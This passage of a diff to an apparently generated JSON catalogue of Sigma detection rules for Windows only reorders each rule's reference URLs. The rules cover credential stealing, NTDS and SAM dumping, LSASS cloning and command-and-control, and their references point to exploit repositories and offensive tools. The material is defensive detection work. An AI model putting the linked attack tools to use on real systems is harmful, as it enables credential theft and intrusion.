"https://github.com/redcanaryco/atomic-red-team/blob/36d49de4c8b00bf36054294b4a1fcbab3917d7c5/atomics/T1547.001/T1547.001.md#atomic-test-7---add-executable-shortcut-link-to-user-startup-folder", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_startup_shortcuts.yml" ], "tags": [ @@ -32898,8 +32898,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.html", "https://github.com/OTRF/detection-hackathon-apt29/issues/12", + "https://threathunterplaybook.com/evals/apt29/detections/5.B.1_611FCA99-97D0-4873-9E51-1C1BA2DBB40D.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_startup_folder_file_write.yml" ], "tags": [ @@ -32958,9 +32958,9 @@ "logsource.product": "windows", "refs": [ "https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration", - "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1", "https://pentestlab.blog/tag/ntds-dit/", + "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit.yml" ], "tags": [ @@ -32993,8 +32993,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb", "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/data/post/powershell/NTDSgrab.ps1", + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/post/windows/gather/ntds_grabber.rb", "https://github.com/SecureAuthCorp/impacket/blob/7d2991d78836b376452ca58b3d14daa61b67cb40/impacket/examples/secretsdump.py#L2405", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml" ], @@ -33062,8 +33062,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/vanitasnk/status/1437329511142420483?s=21", "https://twitter.com/RonnyTNL/status/1436334640617373699?s=20", + "https://twitter.com/vanitasnk/status/1437329511142420483?s=21", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_winword_cve_2021_40444.yml" ], "tags": [ @@ -33153,8 +33153,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", "https://twitter.com/SBousseaden/status/1278977301745741825", + "https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml" ], "tags": [ @@ -33221,11 +33221,11 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://github.com/cube0x0/CVE-2021-36934", + "https://www.google.com/search?q=%22reg.exe+save%22+sam", + "https://github.com/search?q=CVE-2021-36934", "https://github.com/HuskyHacks/ShadowSteal", "https://github.com/FireFart/hivenightmare", - "https://github.com/cube0x0/CVE-2021-36934", - "https://github.com/search?q=CVE-2021-36934", - "https://www.google.com/search?q=%22reg.exe+save%22+sam", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sam_dump.yml" ], "tags": [ @@ -33375,10 +33375,10 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/cube0x0/status/1418920190759378944", - "https://github.com/GossiTheDog/HiveNightmare", - "https://github.com/FireFart/hivenightmare/", "https://github.com/WiredPulse/Invoke-HiveNightmare", + "https://github.com/FireFart/hivenightmare/", + "https://github.com/GossiTheDog/HiveNightmare", + "https://twitter.com/cube0x0/status/1418920190759378944", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hivenightmare_file_exports.yml" ], "tags": [ @@ -33470,9 +33470,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", - "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", "https://redcanary.com/blog/intelligence-insights-october-2021/", + "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/", + "https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_mal_vhd_download.yml" ], "tags": [ @@ -33572,8 +33572,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc", "https://posts.specterops.io/automating-dll-hijack-discovery-81c4295904b0", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d46dd4ac6866b4337ec126be8cee0e115467b3e8703794ba6f6df6432c806bc", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_initial_access_dll_search_order_hijacking.yml" ], "tags": [ @@ -33754,8 +33754,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/", "https://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/", + "https://insights.sei.cmu.edu/blog/the-dangers-of-vhd-and-vhdx-files/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", "https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_iso_file_recent.yml" @@ -33812,8 +33812,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", "https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd", + "https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_msdt_autorun.yml" ], "tags": [ @@ -33897,9 +33897,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ + "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", "https://github.com/fox-it/LDAPFragger", - "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_adsi_cache_usage.yml" ], "tags": [ @@ -34038,8 +34038,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.joesandbox.com/analysis/465533/0/html", "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/", + "https://www.joesandbox.com/analysis/465533/0/html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_get_variable.yml" ], "tags": [ @@ -34107,8 +34107,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", + "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_access_susp_teams.yml" ], "tags": [ @@ -34274,10 +34274,10 @@ "logsource.product": "windows", "refs": [ "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", - "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", - "https://decoded.avast.io/martinchlumecky/png-steganography/", "https://github.com/Wh04m1001/SysmonEoP", "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://decoded.avast.io/martinchlumecky/png-steganography/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_create_non_existent_dlls.yml" ], "tags": [ @@ -34372,9 +34372,9 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "Malware Sandbox https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/", - "http://addbalance.com/word/startup.htm", "https://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3", + "http://addbalance.com/word/startup.htm", + "Malware Sandbox https://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_winword_startup.yml" ], "tags": [ @@ -34407,8 +34407,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel", + "https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_pingback_backdoor.yml" ], "tags": [ @@ -34465,8 +34465,8 @@ "logsource.category": "file_event", "logsource.product": "windows", "refs": [ - "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://twitter.com/cyb3rops/status/1552932770464292864", + "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml" ], "tags": [ @@ -34815,8 +34815,8 @@ "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz", "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml" ], "tags": [ @@ -34849,8 +34849,8 @@ "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://web.archive.org/web/20181130065817/http://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/", "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords", + "https://web.archive.org/web/20181130065817/http://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml" ], "tags": [ @@ -34886,8 +34886,8 @@ "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users", "https://github.com/lclevy/firepwd", + "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_stealing.yml" ], "tags": [ @@ -35011,8 +35011,8 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", "https://twitter.com/notwhickey/status/1333900137232523264", + "https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_lolbin_appinstaller.yml" ], "tags": [ @@ -35111,10 +35111,10 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", - "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution", + "https://redcanary.com/blog/misbehaving-rats/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_remote_access_software_domains.yml" ], "tags": [ @@ -35147,8 +35147,8 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", "https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/", + "https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml" ], "tags": [ @@ -35256,8 +35256,8 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", + "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml" ], "tags": [ @@ -35421,8 +35421,8 @@ "logsource.category": "dns_query", "logsource.product": "windows", "refs": [ - "https://twitter.com/neonprimetime/status/1436376497980428318", "https://www.binarydefense.com/analysis-of-hancitor-when-boring-begets-beacon", + "https://twitter.com/neonprimetime/status/1436376497980428318", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/dns_query/dns_query_win_susp_ipify.yml" ], "tags": [ @@ -35747,8 +35747,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_athremotefxvgpudisablementcommand.yml" ], "tags": [ @@ -35844,9 +35844,9 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/eral4m/status/1479106975967240209", + "https://twitter.com/nas_bench/status/1433344116071583746", "https://twitter.com/Hexacorn/status/885258886428725250", "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52", - "https://twitter.com/nas_bench/status/1433344116071583746", "http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/", "https://twitter.com/eral4m/status/1479080793003671557", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_activity.yml" @@ -35981,8 +35981,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://securelist.com/my-name-is-dtrack/93338/", "https://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/", + "https://securelist.com/my-name-is-dtrack/93338/", "https://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_dtrack.yml" ], @@ -36074,8 +36074,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", "https://www.mandiant.com/resources/telegram-malware-iranian-espionage", + "https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_screenconnect_anomaly.yml" ], "tags": [ @@ -36157,8 +36157,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", + "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_loadassembly.yml" ], "tags": [ @@ -36235,8 +36235,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11)", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntdsutil_usage.yml" ], "tags": [ @@ -36303,9 +36303,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", - "https://twitter.com/frack113/status/1555830623633375232", "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN", + "https://twitter.com/frack113/status/1555830623633375232", + "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_path_use_image.yml" ], "tags": [ @@ -36482,9 +36482,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/countuponsec/status/910969424215232518", - "https://twitter.com/countuponsec/status/910977826853068800", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", + "https://twitter.com/countuponsec/status/910977826853068800", + "https://twitter.com/countuponsec/status/910969424215232518", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml" ], "tags": [ @@ -36574,9 +36574,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", - "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_proc_wrong_parent.yml" ], "tags": [ @@ -36691,9 +36691,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", "Reegun J (OCBC Bank)", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/", - "https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_msoffice.yml" ], "tags": [ @@ -36828,10 +36828,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://isc.sans.edu/diary/22264", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/", + "https://isc.sans.edu/diary/22264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_ip.yml" ], "tags": [ @@ -36874,9 +36874,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", - "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", "https://twitter.com/Hexacorn/status/1420053502554951689", + "https://twitter.com/SBousseaden/status/1464566846594691073?s=20", + "https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lsass_clone.yml" ], "tags": [ @@ -36918,8 +36918,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/electron/rcedit", - "https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe", "https://www.virustotal.com/gui/file/02e8e8c5d430d8b768980f517b62d7792d690982b9ba0f7e04163cbc1a6e7915", + "https://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rcedit_execution.yml" ], "tags": [ @@ -36997,9 +36997,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", - "https://github.com/SigmaHQ/sigma/issues/1009", "https://redcanary.com/blog/raspberry-robin/", + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml" ], "tags": [ @@ -37079,10 +37079,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", - "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", "https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters", + "https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/", + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_nltest_recon.yml" ], "tags": [ @@ -37312,8 +37312,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", + "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_shell.yml" ], "tags": [ @@ -37387,8 +37387,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/mandiant/SharPersist", "https://www.mandiant.com/resources/blog/sharpersist-windows-persistence-toolkit", + "https://github.com/mandiant/SharPersist", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_sharpersist.yml" ], "tags": [ @@ -37438,8 +37438,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/BloodHoundAD/BloodHound", "https://github.com/BloodHoundAD/SharpHound", + "https://github.com/BloodHoundAD/BloodHound", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml" ], "tags": [ @@ -37506,8 +37506,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/johnlatwc/status/1408062131321270282?s=12", "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf", + "https://twitter.com/johnlatwc/status/1408062131321270282?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wmic_eventconsumer_create.yml" ], "tags": [ @@ -37575,8 +37575,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36", + "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_c2_sliver.yml" ], "tags": [ @@ -37745,8 +37745,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/", "https://twitter.com/Oddvarmoe/status/1270633613449723905", + "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal.yml" ], "tags": [ @@ -37871,8 +37871,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.youtube.com/watch?v=ro2QuZTIMBM", "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.youtube.com/watch?v=ro2QuZTIMBM", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc.yml" ], "tags": [ @@ -37928,11 +37928,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://isc.sans.edu/diary/22264", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", + "https://isc.sans.edu/diary/22264", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_susp_domain.yml" ], "tags": [ @@ -37975,9 +37975,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/nas_bench/status/1534915321856917506", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/", "https://twitter.com/nas_bench/status/1534916659676422152", - "https://twitter.com/nas_bench/status/1534915321856917506", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml" ], "tags": [ @@ -38012,8 +38012,8 @@ "logsource.product": "windows", "refs": [ "https://www.nirsoft.net/utils/nircmd.html", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://www.nirsoft.net/utils/nircmd2.html#using", + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_nircmd_as_system.yml" ], "tags": [ @@ -38275,8 +38275,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/", "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html", + "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_detection.yml" ], "tags": [ @@ -38586,9 +38586,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", "https://github.com/binderlabs/DirCreate2System", "https://www.echotrail.io/insights/search/wermgr.exe", + "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_wermgr.yml" ], "tags": "No established tags" @@ -38643,8 +38643,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://ss64.com/nt/cmd.html", "https://twitter.com/cyb3rops/status/1562072617552678912", + "https://ss64.com/nt/cmd.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_missing_spaces.yml" ], "tags": [ @@ -38677,10 +38677,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - 